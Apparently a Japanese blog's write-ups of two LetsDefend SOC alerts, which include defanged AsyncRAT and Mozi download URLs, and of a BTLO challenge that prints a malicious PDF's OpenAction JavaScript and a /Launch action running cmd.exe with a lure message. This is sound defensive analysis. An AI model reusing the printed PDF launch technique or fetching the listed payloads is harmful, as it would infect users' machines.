• Details
• playbook
  • Analyze URL Address
    • 217.8.117.7
    • http[:]//jamesrlongacre.ac[.]ug/ac.exe
    • User Agent: Firewall Test - Dont Block <- ????
  • Has Anyone Accessed IP/URL/Domain?
  • Add Artifacts
• End

Details

EventID: 26
Event Time: Oct. 29, 2020, 7:05 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 217.8.117.77
Destination Hostname jamesrlongacre.ac.ug
Username Bill
Request URL http[:]//jamesrlongacre.ac[.]ug/ac.exe
User Agent: Firewall Test - Dont Block
Device Action Blocked

playbook

Analyze URL Address

まずはIPから調査、

217.8.117.7

VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/217.8.117.7
URLhaus: https://urlhaus.abuse.ch/browse.php?search=217.8.117.77
ip-sc: https://ip-sc.net/ja/r/217.8.117.77
VTでは登録数は多くないが、URLhausでAsyncRAT,ArkeiStealer,AZORult,RacoonStealer等の様々なマルウェアとの関連が報告されているため IPがMaliciousであると判断しても良い。
ip-scにて脅威レベルは低いとされている、ロシアのIPである。

http[:]//jamesrlongacre.ac[.]ug/ac.exe

VirusTotal 10/93: https://www.virustotal.com/gui/url/3114ff42180d969ca55e5b84e12ec4119bf402e520f5ad4f27eec137d1a8ec4f
URLhaus: https://urlhaus.abuse.ch/url/748266/
URLをVTで検索すると登録数は増え、URLhausでも確認した。AsyncRATのダウンロードであるらしい。
AsyncRAT (Malware Family)
ダウンロードされるファイルはVTのレポートを見ると、何度も同じIPから配布されていた。
VirusTotal: ac.exe

User Agent: Firewall Test - Dont Block <- ????

ここまでこれば、今回ブロックされたURLはMaliciousであるということは間違いないと言える。
ただ、気になるのはUser Agentだ。これは、もしかするとセキュリティテストの一環としての作業に利用していたことも考えられるが、 アクセス先は明らかに怪しい。
また、このホストからは29分後に以下の記事で解析を行ったアラートが検知されている。
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28 - 4ensiX
後のアラートの関連性は分からないが、テストに見せかけた攻撃と思える。

Answer:Malicious

Has Anyone Accessed IP/URL/Domain?

Device Action Blocked

Logも確認し、ブロックされている。

Request URL: http://jamesrlongacre.ac.ug/ac.exe
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

Answer:Not Accessed

Add Artifacts

True Positive

End

• Details
• playbook
  • Analyze Threat Intel Data
    • http[:]//115.99.150.132:56841/Mozi.m
    • Download file　Mozi.m
  • Interaction with TI data
    • Log search
  • Add Artifacts
• End

Details

EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http[:]//115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked

playbook

Analyze Threat Intel Data

http[:]//115.99.150.132:56841/Mozi.m

VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
VTでは有名どころのベンダーによってMalicious判定されているためURLは怪しい。
URLhausにあるためにURLは間違いなくマルウェアに関連している。

Download file　Mozi.m

• b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605 VirusTotal 42/61: https://www.virustotal.com/gui/file/b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605/detection/f-b5cf68c
  実際のファイルが取得できなかったために中身は分からないがelfファイルのようだ。VTからもMaliciousである。
  
  

Answer: Malicious

Interaction with TI data

Log search

Request URL: http://115.99.150.132:56841/Mozi.m
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

アクセスはブロックされている。 Endpointには手がかりは見つからなかった。

Answer: Not Accessed

Add Artifacts

End

BTLO Challenge Suspicious USB Stick(Retired Challenge)

• Scenario
• Challenge Submission
  • 1. What file is the autorun.inf running? (3 points)
  • 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
  • 3. Does the file have the correct magic number? (2 points)
  • 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
  • 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
  • 6. How many suspicious /OpenAction elements does the file have? (5 points)

Scenario

One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?

Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

Challenge Submission

1. What file is the autorun.inf running? (3 points)

Format: filename.extension

$ cat autorun.inf 
[autorun]
open=README.pdf
icon=autorun.ico

Answer: README.pdf

2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)

True or False

SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43

38/59

Answer: False

3. Does the file have the correct magic number? (2 points)

True or False

$ file README.pdf 
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|

Answer: True

4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)

Operating System

$ pdfinfo  README.pdf 
Creator:        StarMan
CreationDate:   Thu Feb 11 02:54:49 2021 EST
ModDate:        Thu Feb 11 02:54:49 2021 EST
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
Syntax Warning: Bad launch-type link action
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      136561 bytes
Optimized:      no
PDF version:    1.7
$ pdfid  README.pdf 
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
$ pdf-parser -a README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
# /JS,/JavaScript,/OpenAction,/Launchのチェック
$ pdf-parser -o 27 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing: 

  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
    /Type /Action
  >>
$ pdf-parser -o 1 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Names 23 0 R
    /OpenAction 27 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>
$ pdf-parser -o 28 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing: 

  <<
    /S /Launch
    /Type /Action
    /Win
      <<
        /F (cmd.exe)
        /D '(c:\\\\windows\\\\system32)'
        /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
      >>
  >>

Answer: windows

5. A Windows executable is mentioned in the pdf file, what is it? (3 points)

Format: filename.exe
$ pdf-parser -o 28 README.pdfの結果より、
Answer: cmd.exe

6. How many suspicious /OpenAction elements does the file have? (5 points)

$ pdfid README.pdfの結果、そしてobj 1の/OpenAction 27と怪しいJavaScriptの実行がある。
Answer: 1